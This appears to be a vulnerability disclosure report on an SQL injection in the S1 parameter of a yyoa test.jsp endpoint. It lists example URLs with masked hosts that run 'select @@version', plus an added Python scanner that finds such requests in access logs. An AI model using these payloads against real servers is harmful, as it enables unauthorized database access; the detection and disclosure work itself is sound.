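### Brief description:
See title.
### Details:
I searched, and this has not been submitted before.
The vulnerability is in the S1 parameter of the file /yyoa/common/js/menu/test.jsp
Cases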
```
http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version
http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version
**.**.**.**:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version
http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version
http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version
http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version
```
For more cases, see http://**.**.**.**/bugs/wooyun-2015-0105038
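
For defenders checking whether this endpoint has been requested on their own servers, the following added example (not part of the original report) scans web access logs for requests to the reported path that carry the `S1` parameter and returns the decoded SQL text. It assumes common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

VULN_PATH = "/yyoa/common/js/menu/test.jsp"   # endpoint named in the report
SQL_PARAM = "S1"                               # parameter named in the report

# Assumption: access logs are in common/combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def normalize_path(raw_path):
    """Decode %XX, drop ';param' path parameters, collapse repeated slashes,
    so that equivalent spellings of the same path are compared equal."""
    segments = [seg.split(";", 1)[0] for seg in unquote(raw_path).split("/")]
    return "/" + "/".join(s for s in segments if s)

def find_hits(log_lines):
    """Return one record per request that reached the endpoint with S1 set."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log entry
        url = urlsplit(m.group("target"))
        if normalize_path(url.path).lower() != VULN_PATH:
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get(SQL_PARAM, []):
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "status": int(m.group("status")), "sql": value})
    return hits

# Constructed sample log lines (documentation address ranges, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Nov/2015:23:20:01 +0800] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version HTTP/1.1" 200 512',
    '192.0.2.10 - - [25/Nov/2015:23:20:05 +0800] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=select+1 HTTP/1.1" 200 498',
    '198.51.100.7 - - [25/Nov/2015:23:21:00 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 2048',
    '198.51.100.7 - - [25/Nov/2015:23:21:09 +0800] "GET /yyoa/common/js/menu/menu.js HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```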
### Proof of vulnerability:
[![QQ20151125-3@2x.png](https://images.seebug.org/upload/201511/25232331ae0747854ae60d3dc743659765070276.png)](https://images.seebug.org/upload/201511/25232331ae0747854ae60d3dc743659765070276.png)
[![QQ20151125-4@2x.png](https://images.seebug.org/upload/201511/25232346b1c091cfface04fc1cacec9eb4427ceb.png)](https://images.seebug.org/upload/201511/25232346b1c091cfface04fc1cacec9eb4427ceb.png)
[![QQ20151125-5@2x.png](https://images.seebug.org/upload/201511/25232402cf950414a36fd88f87ac719c1b9728bb.png)](https://images.seebug.org/upload/201511/25232402cf950414a36fd88f87ac719c1b9728bb.png)
[![QQ20151125-6@2x.png](https://images.seebug.org/upload/201511/25232423d386fb9d4ad90853d707697b665a6865.png)](https://images.seebug.org/upload/201511/25232423d386fb9d4ad90853d707697b665a6865.png)
[![QQ20151125-7@2x.png](https://images.seebug.org/upload/201511/25232444450c1b40b9d6be7fad7210be71485435.png)](https://images.seebug.org/upload/201511/25232444450c1b40b9d6be7fad7210be71485435.png)